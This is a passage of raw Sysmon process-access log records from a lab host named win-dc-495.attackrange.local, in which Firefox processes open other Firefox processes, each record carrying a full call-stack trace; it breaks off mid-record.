10341000x800000000000000016996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000016990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 